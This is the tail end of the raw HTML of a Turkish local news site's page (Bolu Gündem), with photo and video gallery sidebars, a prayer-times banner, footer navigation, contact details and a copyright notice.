ilgi</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/ogrenciler-halep-icin-yurudu-1634g.htm"><img src="http://www.bolugundem.com/d/gallery/1634_s.jpg" alt="Öğrenciler Halep için yürüdü" width="127" height="96" /><span class="tl"></span><span class="wrapword">Öğrenciler Halep için yürüdü</span></a></li><li class="item"><a href="http://www.bolugundem.com/yilmaz-ozan-ozen-kutuphanesinin-acilisini-yapti-1633g.htm"><img src="http://www.bolugundem.com/d/gallery/1633_s.jpg" alt="Yılmaz, Ozan Özen Kütüphanesi’nin açılışını yaptı" width="127" height="96" /><span class="tl"></span><span class="wrapword">Yılmaz, Ozan Özen Kütüphanesi’nin açılışını yaptı</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/cocuklarin-kar-eglencesi-1632g.htm"><img src="http://www.bolugundem.com/d/gallery/1632_s.jpg" alt="Çocukların kar eğlencesi" width="127" height="96" /><span class="tl"></span><span class="wrapword">Çocukların kar eğlencesi</span></a></li></ul><div class="side_content_pager gallery_side_pager"><div class="pager"><span data-value="1">1</span><span data-value="2">2</span><span data-value="3">3</span><span data-value="4">4</span><span data-value="5">5</span><span data-value="6">6</span><span data-value="7">7</span><span data-value="8">8</span></div></div></div><div class="side_content_bottom"></div><div class="side_caption"><a href="http://www.bolugundem.com/video-galeri.htm">VİDEO GALERİ</a></div><div class="side_content"><ul class="gallery_side" id="video_side"><li class="item"><a href="http://www.bolugundem.com/seben-tanitim-filmi-139v.htm"><img src="http://www.bolugundem.com/d/video/139.jpg" alt="Seben tanıtım filmi" width="127" height="96" /><span class="tl"></span><span class="wrapword">Seben tanıtım filmi</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/29-ekim-cumhuriyet-bayraminiz-kutlu-olsun-138v.htm"><img src="http://www.bolugundem.com/d/video/138.jpg" alt="29 Ekim Cumhuriyet Bayramınız Kutlu Olsun" width="127" height="96" /><span class="tl"></span><span class="wrapword">29 Ekim Cumhuriyet Bayramınız Kutlu Olsun</span></a></li><li class="item"><a href="http://www.bolugundem.com/sehit-ziya-sarpkaya-klibi-137v.htm"><img src="http://www.bolugundem.com/d/video/137.jpg" alt="Şehit Ziya Sarpkaya Klibi" width="127" height="96" /><span class="tl"></span><span class="wrapword">Şehit Ziya Sarpkaya Klibi</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/yumurta-aldilar-altini-kaptilar-136v.htm"><img src="http://www.bolugundem.com/d/video/136.jpg" alt="Yumurta aldılar altını kaptılar" width="127" height="96" /><span class="tl"></span><span class="wrapword">Yumurta aldılar altını kaptılar</span></a></li></ul><div class="side_content_pager video_side_pager"><div class="pager"><span data-value="1">1</span><span data-value="2">2</span><span data-value="3">3</span><span data-value="4">4</span><span data-value="5">5</span><span data-value="6">6</span><span data-value="7">7</span><span data-value="8">8</span></div></div></div><div class="side_content_bottom"></div><div class="banner side_banner"><iframe frameborder="0" width="300" height="90" scrolling="no" src="http://haberciniz.biz/service/prayer/index.php?p=14"></iframe></div><div class="side_cat_news"></div></div></div></div><div class="base_outer"><div class="base_bottom base_position"><div class="social"><a href="https://www.facebook.com/bolugundem" style="background-position: left -168px;" target="_blank" title="Facebook ile paylaş"></a><a href="http://www.bolugundem.com/rss/" style="background-position: left -144px;" target="_blank" title="RSS, News Feed, Haber Beslemesi"></a></div><ul class="nav"><li class="parent"><a href="http://www.bolugundem.com//" target="_self">Ana Sayfa</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/identity.php" target="_self">Künye</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/contact.php" target="_self">İletişim</a></li><li class="sep">|</li><li class="parent"><a href="#" target="_self" onclick="addToBookmark('Bolu Gündem', 'http://www.bolugundem.com/'); return false;">Sık Kullanılanlara Ekle</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/rss/" target="_self">RSS</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/guncel-haberleri-144hk.htm" target="_self">Güncel</a></li></ul><div class="info"><strong>Tüm Hakları Saklıdır &copy; 1989 Bolu Gündem Gazetesi</strong> | İzinsiz ve kaynak gösterilmeden yayınlanamaz.<br />Tel : (0.374) 217 66 66 | Faks : (0.374) 218 21 21 | <a href="http://www.cmbilisim.com/haber-portali-20s.htm" target="_blank" title="CMNews Haber Portalı Yazılımı">Haber Yazılımı</a>: <a href="http://www.cmbilisim.com/" target="_blank" title="CM Bilişim Teknolojileri">CM Bilişim</a></div></div></div><!-- 0.010493993759155 --></div><script type="text/javascript">showLogin("", "", "", "")</script></body></html>